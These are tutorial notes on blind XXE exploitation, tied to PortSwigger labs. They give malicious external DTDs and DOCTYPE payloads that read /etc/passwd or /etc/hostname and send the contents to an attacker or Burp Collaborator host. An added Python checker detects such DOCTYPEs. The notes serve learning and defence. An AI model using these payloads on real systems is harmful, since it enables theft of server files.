Blind XXE Attacks: Exploitation

Last updated 2 years ago

What we did so far was just to get a ping back to our Burp Collaborator from the remote host, but that alone doesn't tell us how to go on and actually exploit this vulnerability.

  • Every attacker wants to retrieve some sort of interesting information, and this can be achieved using this Blind XXE

  • But this attack is only possible when the attacker hosts a malicious DTD on a system that they control, and then invokes that external DTD from within the in-band XXE payload.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://ATTACKER IP/?x=%file;'>">
%eval;
%exfiltrate;
  1. It defines an XML parameter entity called file, which contains the contents of /etc/passwd

  2. It then defines another XML parameter entity called eval, containing a dynamic declaration of another parameter entity called exfiltrate

  3. The exfiltrate entity will be evaluated by making an HTTP request to the attacker's web server, containing the value of the file entity within the URL query string

  4. It uses the eval entity, which causes the dynamic declaration of the exfiltrate entity to be performed

  5. It uses the exfiltrate entity, so that its value is evaluated by requesting the specified URL

The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own web server, for example at:

http://BURP-COLLABORATOR/malicious.dtd

Finally, the attacker must modify the request so that its DOCTYPE looks something like this:

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER IP/malicious.dtd"> %xxe; ]>
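A defensive counterpart, added here as an editor's example and not code from the original page or from PortSwigger: a small pre-parse check that flags the DOCTYPE shape shown above (a parameter entity whose SYSTEM identifier points at a remote DTD) before the request ever reaches the XML parser. The sample requests, the placeholder DTD host and the finding names are constructed for this example.

```python
import re
from html import unescape

# Constructed samples (not from the page): the DOCTYPE shape shown above,
# with the attacker URL replaced by a placeholder, beside a benign request.
BLIND_XXE_REQUEST = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM "http://DTD-HOST-PLACEHOLDER/malicious.dtd"> %xxe; ]>'
    '<stockCheck><productId>1</productId></stockCheck>'
)
BENIGN_REQUEST = '<?xml version="1.0"?><stockCheck><productId>1</productId></stockCheck>'

DOCTYPE_RE = re.compile(r'<!DOCTYPE\b(?P<header>[^\[>]*)(?:\[(?P<subset>.*?)\])?\s*>', re.S | re.I)
ENTITY_RE = re.compile(r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>\S+)\s+(?P<body>.*?)>', re.S | re.I)
# SYSTEM/PUBLIC identifiers whose literal begins with a scheme that leaves the parser
REMOTE_RE = re.compile(r'\b(?:SYSTEM|PUBLIC)\b[^>]*?["\'](?P<scheme>https?|ftp|file|jar|gopher):', re.I)
PE_REF_RE = re.compile(r'%\s*[\w.-]+\s*;')


def inspect_xml(doc: str) -> list:
    """Return XXE indicators found in the DOCTYPE of `doc` (empty list if none).

    Only the prolog is inspected: in a blind XXE the exfiltration logic lives in
    the remote DTD, so the request itself only shows the external reference."""
    findings = []
    m = DOCTYPE_RE.search(doc)
    if not m:
        return findings
    ext = REMOTE_RE.search(m.group("header"))
    if ext:                                   # <!DOCTYPE x SYSTEM "http://...">
        findings.append(f"external-dtd:{ext.group('scheme').lower()}")
    # The DTD above smuggles a '%' in as &#x25;; decode character references so a
    # nested declaration written that way is inspected like a literal one.
    subset = unescape(m.group("subset") or "")
    for ent in ENTITY_RE.finditer(subset):
        kind = "parameter-entity" if ent.group("param") else "general-entity"
        findings.append(f"{kind}:{ent.group('name')}")
        r = REMOTE_RE.search(ent.group("body"))
        if r:
            findings.append(f"external-ref:{ent.group('name')}:{r.group('scheme').lower()}")
    if PE_REF_RE.search(subset):              # e.g. %xxe; evaluated inside the subset
        findings.append("parameter-entity-reference")
    return findings


def is_safe(doc: str) -> bool:
    """Reject before parsing when the DOCTYPE declares parameter entities or
    references anything external; documents without a DOCTYPE pass."""
    blocked = ("external-dtd", "external-ref", "parameter-entity")
    return not any(f.startswith(blocked) for f in inspect_xml(doc))
```

This is a pre-filter for logging and early rejection, not a replacement for disabling DTD processing and external entity resolution in the parser itself.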
PortSwigger Exercises

In this exercise we manage to exfiltrate the hostname using a malicious external DTD.

When we try to ping back our Burp Collaborator the usual way, it doesn't work, so we'll have to try another way to get it.

Luckily, PortSwigger labs provide us with an exploit server where we can craft and store our own payload

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLAB/exploit.dtd'>">
%eval;
%exfil;

When we store this payload, notice the URL: it is the address of our malicious DTD.

Now we can exploit it the normal way,

<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM "https://THE-MALICIOUS-DTD-URL/exploit.dtd"> %xxe; ]>

And now when we Poll Back, we notice there is both a DNS and an HTTP interaction. Checking out the HTTP request shows a GET request containing the hostname:

GET /?x=<HOSTNAME>

Note

/etc/passwd doesn't work because of the newline characters in the file: some XML parsers fetch the URL in the external entity definition using an API that validates the characters that are allowed to appear within the URL.

  • It is best to use FTP:// instead of HTTP://

That's why we use files like /etc/hostname